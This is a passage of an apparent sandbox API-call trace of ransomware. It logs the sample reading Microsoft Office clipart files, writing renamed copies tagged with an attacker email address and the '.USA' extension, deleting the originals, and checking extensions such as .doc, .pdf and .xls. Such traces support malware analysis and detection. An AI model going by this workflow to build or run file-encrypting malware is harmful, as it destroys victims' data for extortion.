hFile=0x3a8, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xff0, lpOverlapped=0x0) returned 1 [0271.196] ReadFile (in: hFile=0x394, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.196] WriteFile (in: hFile=0x3a8, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.197] SetEndOfFile (hFile=0x3a8) returned 1 [0271.197] CloseHandle (hObject=0x3a8) returned 1 [0271.197] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.197] SetEndOfFile (hFile=0x394) returned 1 [0271.208] CloseHandle (hObject=0x394) returned 1 [0271.208] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.228] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf")) returned 1 [0271.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63 [0271.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63 [0271.233] lstrlenW (lpString=".doc") returned 4 [0271.233] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.233] lstrlenW (lpString=".docx") returned 5 [0271.233] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.234] lstrlenW (lpString=".pdf") returned 4 [0271.234] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.234] lstrlenW (lpString=".xls") returned 4 [0271.234] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.234] lstrlenW (lpString=".xlsx") returned 5 [0271.234] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.234] lstrlenW (lpString=".ppt") returned 4 [0271.234] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63 [0271.234] lstrlenW (lpString=".zip") returned 4 [0271.234] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.234] lstrlenW (lpString=".rar") returned 4 [0271.234] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.234] lstrlenW (lpString=".bz2") returned 4 [0271.234] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.234] lstrlenW (lpString=".7z") returned 3 [0271.234] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63 [0271.234] lstrlenW (lpString=".dbf") returned 4 [0271.234] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63 [0271.234] lstrlenW (lpString=".1cd") returned 4 [0271.234] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63 [0271.234] lstrlenW (lpString=".jpg") returned 4 [0271.234] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63 [0271.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63 [0271.235] lstrlenW (lpString=".doc") returned 4 [0271.235] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.235] lstrlenW (lpString=".docx") returned 5 [0271.235] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.235] lstrlenW (lpString=".pdf") returned 4 [0271.235] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.235] lstrlenW (lpString=".xls") returned 4 [0271.235] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.235] lstrlenW (lpString=".xlsx") returned 5 [0271.235] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.235] lstrlenW (lpString=".ppt") returned 4 [0271.235] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63 [0271.235] lstrlenW (lpString=".zip") returned 4 [0271.235] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.235] lstrlenW (lpString=".rar") returned 4 [0271.235] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.235] lstrlenW (lpString=".bz2") returned 4 [0271.235] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.235] lstrlenW (lpString=".7z") returned 3 [0271.235] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63 [0271.235] lstrlenW (lpString=".dbf") returned 4 [0271.235] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63 [0271.235] lstrlenW (lpString=".1cd") returned 4 [0271.235] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 63 [0271.235] lstrlenW (lpString=".jpg") returned 4 [0271.235] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.236] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.236] lstrlenW (lpString="FD00369_.WMF") returned 12 [0271.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0271.236] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=8552) returned 1 [0271.236] CloseHandle (hObject=0x2ac) returned 1 [0271.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf")) returned 0x20 [0271.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0271.237] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.237] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.237] GetLastError () returned 0x0 [0271.237] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x2168, lpOverlapped=0x0) returned 1 [0271.242] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x2170, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x2170, lpOverlapped=0x0) returned 1 [0271.243] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.243] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.243] SetEndOfFile (hFile=0x328) returned 1 [0271.243] CloseHandle (hObject=0x328) returned 1 [0271.243] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.243] SetEndOfFile (hFile=0x2ac) returned 1 [0271.245] CloseHandle (hObject=0x2ac) returned 1 [0271.245] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.245] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf")) returned 1 [0271.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63 [0271.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63 [0271.245] lstrlenW (lpString=".doc") returned 4 [0271.245] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.245] lstrlenW (lpString=".docx") returned 5 [0271.246] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.246] lstrlenW (lpString=".pdf") returned 4 [0271.246] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.246] lstrlenW (lpString=".xls") returned 4 [0271.246] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.246] lstrlenW (lpString=".xlsx") returned 5 [0271.246] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.246] lstrlenW (lpString=".ppt") returned 4 [0271.246] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63 [0271.246] lstrlenW (lpString=".zip") returned 4 [0271.246] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.246] lstrlenW (lpString=".rar") returned 4 [0271.246] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.246] lstrlenW (lpString=".bz2") returned 4 [0271.246] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.246] lstrlenW (lpString=".7z") returned 3 [0271.246] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63 [0271.246] lstrlenW (lpString=".dbf") returned 4 [0271.246] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63 [0271.246] lstrlenW (lpString=".1cd") returned 4 [0271.246] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63 [0271.246] lstrlenW (lpString=".jpg") returned 4 [0271.246] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63 [0271.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63 [0271.247] lstrlenW (lpString=".doc") returned 4 [0271.247] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.247] lstrlenW (lpString=".docx") returned 5 [0271.247] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.247] lstrlenW (lpString=".pdf") returned 4 [0271.247] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.247] lstrlenW (lpString=".xls") returned 4 [0271.247] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.247] lstrlenW (lpString=".xlsx") returned 5 [0271.247] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.247] lstrlenW (lpString=".ppt") returned 4 [0271.247] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63 [0271.247] lstrlenW (lpString=".zip") returned 4 [0271.247] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.247] lstrlenW (lpString=".rar") returned 4 [0271.247] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.247] lstrlenW (lpString=".bz2") returned 4 [0271.247] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.247] lstrlenW (lpString=".7z") returned 3 [0271.247] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63 [0271.247] lstrlenW (lpString=".dbf") returned 4 [0271.247] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63 [0271.247] lstrlenW (lpString=".1cd") returned 4 [0271.247] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63 [0271.247] lstrlenW (lpString=".jpg") returned 4 [0271.248] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.248] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.248] lstrlenW (lpString="FD00382_.WMF") returned 12 [0271.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0271.248] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=8424) returned 1 [0271.248] CloseHandle (hObject=0x2ac) returned 1 [0271.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf")) returned 0x20 [0271.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.281] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.281] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.288] GetLastError () returned 0x0 [0271.288] ReadFile (in: hFile=0x398, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x20e8, lpOverlapped=0x0) returned 1 [0271.290] WriteFile (in: hFile=0x394, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x20f0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x20f0, lpOverlapped=0x0) returned 1 [0271.290] ReadFile (in: hFile=0x398, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.291] WriteFile (in: hFile=0x394, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.291] SetEndOfFile (hFile=0x394) returned 1 [0271.291] CloseHandle (hObject=0x394) returned 1 [0271.291] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.291] SetEndOfFile (hFile=0x398) returned 1 [0271.295] CloseHandle (hObject=0x398) returned 1 [0271.295] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.307] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf")) returned 1 [0271.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63 [0271.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63 [0271.307] lstrlenW (lpString=".doc") returned 4 [0271.307] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.307] lstrlenW (lpString=".docx") returned 5 [0271.307] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.307] lstrlenW (lpString=".pdf") returned 4 [0271.307] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.307] lstrlenW (lpString=".xls") returned 4 [0271.307] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.307] lstrlenW (lpString=".xlsx") returned 5 [0271.307] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.307] lstrlenW (lpString=".ppt") returned 4 [0271.307] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63 [0271.308] lstrlenW (lpString=".zip") returned 4 [0271.308] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.308] lstrlenW (lpString=".rar") returned 4 [0271.308] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.308] lstrlenW (lpString=".bz2") returned 4 [0271.308] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.308] lstrlenW (lpString=".7z") returned 3 [0271.308] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63 [0271.308] lstrlenW (lpString=".dbf") returned 4 [0271.308] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63 [0271.308] lstrlenW (lpString=".1cd") returned 4 [0271.308] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63 [0271.308] lstrlenW (lpString=".jpg") returned 4 [0271.308] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63 [0271.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63 [0271.308] lstrlenW (lpString=".doc") returned 4 [0271.308] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.308] lstrlenW (lpString=".docx") returned 5 [0271.308] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.308] lstrlenW (lpString=".pdf") returned 4 [0271.308] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.308] lstrlenW (lpString=".xls") returned 4 [0271.308] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.308] lstrlenW (lpString=".xlsx") returned 5 [0271.309] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.309] lstrlenW (lpString=".ppt") returned 4 [0271.309] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63 [0271.309] lstrlenW (lpString=".zip") returned 4 [0271.309] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.309] lstrlenW (lpString=".rar") returned 4 [0271.309] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.309] lstrlenW (lpString=".bz2") returned 4 [0271.309] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.309] lstrlenW (lpString=".7z") returned 3 [0271.309] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63 [0271.309] lstrlenW (lpString=".dbf") returned 4 [0271.309] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63 [0271.309] lstrlenW (lpString=".1cd") returned 4 [0271.309] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63 [0271.309] lstrlenW (lpString=".jpg") returned 4 [0271.309] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.310] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.310] lstrlenW (lpString="FD00419_.WMF") returned 12 [0271.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.310] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=16396) returned 1 [0271.310] CloseHandle (hObject=0x394) returned 1 [0271.310] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf")) returned 0x20 [0271.310] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.310] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.310] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.311] GetLastError () returned 0x0 [0271.311] ReadFile (in: hFile=0x394, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x400c, lpOverlapped=0x0) returned 1 [0271.320] WriteFile (in: hFile=0x388, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x4010, lpOverlapped=0x0) returned 1 [0271.320] ReadFile (in: hFile=0x394, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.321] WriteFile (in: hFile=0x388, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 